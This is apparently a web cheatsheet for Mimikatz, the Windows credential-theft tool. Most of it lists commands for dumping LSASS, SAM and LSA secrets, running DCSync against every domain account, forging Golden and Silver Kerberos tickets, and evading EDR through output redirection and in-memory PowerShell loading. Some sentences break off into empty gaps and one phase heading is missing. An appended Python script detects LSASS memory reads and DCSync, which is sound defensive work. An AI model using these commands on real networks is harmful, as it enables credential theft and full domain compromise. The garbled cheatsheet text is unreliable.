Cheatsheet | Mimikatz

mimikatz cheatsheet

However, with great power comes great responsibility. This cheatsheet is strictly for .

⚠️ Warning: Modern Antivirus (AV) and Endpoint Detection & Response (EDR) aggressively flag Mimikatz. You will rarely run the vanilla .exe on a live engagement today.

## Phase 1: Loading & Privilege Escalation

Before running any commands, you must load Mimikatz and gain the necessary rights.

| Command | Purpose |
| :--- | :--- |
| mimikatz.exe | Launch the tool (interactive mode). |
| mimikatz # privilege::debug | Seeks . This is the "master key" to interact with LSASS. |
| mimikatz # token::elevate | Elevates to the SYSTEM account (often needed for LSASS access). |
| mimikatz # exit | Exit the Mimikatz console. |

The same steps as a one-liner:

```
mimikatz.exe "privilege::debug" "token::elevate" "exit"
```

### 1. Grab Passwords from LSASS Memory (sekurlsa)

This is the classic "pass-the-hash" or "pass-the-password" attack.

### 2. Dump SAM & LSA Secrets (lsadump)

| Command | Purpose |
| :--- | :--- |
| lsadump::sam | Dumps local SAM hashes (NTLM) from the registry. |
| lsadump::sam /sam:FILE /system:FILE | Dumps the SAM from saved hive files (offline). |
| lsadump::secrets | Dumps secrets from the SECURITY registry hive (e.g., cached domain logons). |

### 3. DCSync (lsadump::dcsync)

Simulate a domain controller to request password hashes for any user.

| Command | Result |
| :--- | :--- |
| lsadump::dcsync /user:Administrator | Gets the hash of a specific user without touching LSASS. |
| lsadump::dcsync /all | Dumps the hashes of every domain user. This is catastrophic for the blue team. |

### 4. Kerberos Attacks (Golden & Silver Tickets)

| Command | Use Case |
| :--- | :--- |
| kerberos::golden /user:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /id:500 /ptt | Create a Golden Ticket (krbtgt hash required). Grants unlimited domain access. |
| kerberos::golden /user:USER /domain:DOMAIN /sid:SID /target:TARGET /rc4:HASH /service:cifs /ptt | Create a Silver Ticket (service account hash required). |
| kerberos::purge | Clear existing Kerberos tickets before injection. |

## Phase 3: Advanced Evasion & Living off the Land

Because modern EDR kills mimikatz.exe, use these techniques:

### Technique A: Non-Exported Output

```
# Log output to a file instead of printing to screen
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit >> C:\temp\log.txt
```

### Technique B: Reflective Loading (PowerShell)

Load Mimikatz directly into memory without touching disk.

```powershell
# Using Invoke-Mimikatz (from PowerSploit)
powershell -exec bypass
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
```

Save commands to a .txt file and execute silently.
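A defender-side counterpart to the sekurlsa and dcsync sections above, added here as an example and not part of the original cheatsheet. It scans simplified log records in the shape of Sysmon Event ID 10 (ProcessAccess) and Windows Security Event ID 4662 (operation on a directory object): an LSASS handle opened with PROCESS_VM_READ by a process outside an allowlist is the telemetry that survives output redirection or in-memory loading, and a 4662 whose Properties carry the directory replication control-access GUIDs from an account that is not a domain controller is the signature of DCSync. The sample events, the allowlist and the DC account set are constructed assumptions to tune per estate; the GUIDs and access-mask bits are the real Active Directory and Win32 values.

```python
"""Toy detections for Mimikatz LSASS access and DCSync over constructed
log records (added example; not the cheatsheet's own code)."""

# Control-access rights a DCSync request exercises (Active Directory schema GUIDs).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

# Process access-mask bit from winnt.h; reading LSASS memory requires it.
PROCESS_VM_READ = 0x0010

# Assumption: processes that legitimately open LSASS on this host (lowercase paths).
LSASS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}


def lsass_access_alert(event):
    """Return an alert string for a Sysmon EID 10 record that reads LSASS memory
    from a non-allowlisted process, or None."""
    if event.get("EventID") != 10:
        return None
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    source = event.get("SourceImage", "").lower()
    if source in LSASS_ALLOWLIST:
        return None
    granted = int(event.get("GrantedAccess", "0x0"), 16)  # Sysmon logs a hex string
    if granted & PROCESS_VM_READ:
        return f"LSASS memory read by {source} (GrantedAccess={granted:#06x})"
    return None


def dcsync_alert(event, dc_accounts):
    """Return an alert string for a Security EID 4662 record in which a
    non-DC account exercised replication rights, or None."""
    if event.get("EventID") != 4662:
        return None
    props = event.get("Properties", "").lower()
    hits = sorted(g for g in REPLICATION_GUIDS if g in props)
    if not hits:
        return None
    subject = event.get("SubjectUserName", "")
    if subject.upper() in dc_accounts:  # DCs replicate with their machine accounts
        return None
    return f"Replication rights exercised by non-DC account {subject}: {', '.join(hits)}"


def scan(events, dc_accounts=frozenset({"DC01$"})):
    """Run both detections over a list of records; return the alerts in order."""
    alerts = []
    for event in events:
        alert = lsass_access_alert(event) or dcsync_alert(event, dc_accounts)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample records (field names follow the real events; values are made up).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 4662, "SubjectUserName": "DC01$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print(line)
```

Only the second and fourth sample records produce alerts: the csrss handle is allowlisted (and lacks PROCESS_VM_READ anyway), and the DC01$ replication event is the normal inter-DC traffic that makes a plain "4662 with replication GUID" rule too noisy without the account check.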
